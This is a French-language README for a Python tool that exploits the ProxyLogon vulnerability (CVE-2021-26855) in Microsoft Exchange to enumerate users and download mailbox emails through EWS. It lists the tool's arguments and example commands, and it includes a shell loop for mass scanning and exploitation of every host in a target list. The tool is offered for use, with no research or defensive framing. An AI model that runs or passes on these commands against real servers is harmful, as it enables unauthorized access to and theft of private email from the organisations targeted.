
Outil Python pour exploiter CVE-2021-26855 (ProxyLogon) afin de télécharger les e-mails de boîte aux lettres Exchange via EWS, avec prise en charge de l'énumération d'utilisateurs et du scan de cibles en masse.
Utilisation de base : python owamails.py -u <url> -l <users.txt> -p <path>
arguments optionnels :
-h, --help affiche ce message d'aide et quitte
-u URL, --url URL URL, fournir le schéma sans le / final (ex.
https://example.org)
-l LIST, --list LIST Liste des boîtes aux lettres utilisateurs
-p PATH, --path PATH Chemin pour écrire les emails au format xml
-f FQDN, --fqdn FQDN FQDN
-d DOMAIN, --domain DOMAIN
Domaine pour vérifier les boîtes aux lettres (ex. si .local ne fonctionne pas)
Vérifier les boîtes aux lettres et télécharger les emails
base :
python owamails.py -u https://127.0.0.1 -l users.txt -p downloads
ne pas obtenir le domaine depuis les en-têtes :
python owamails.py -u https://127.0.0.1 -l users.txt -p downloads -d mydomain.local
ne pas obtenir le FQDN depuis les en-têtes :
python owamails.py -u https://127.0.0.1 -l users.txt -p downloads -f EXCH01
massif ?
for i in $(cat targets.txt); do echo $i && python3 owamails.py -u https://$i -l users.txt -p emails; done;
Références :
fork depuis :
https://gitlab.com/gvillegas/ohwaa/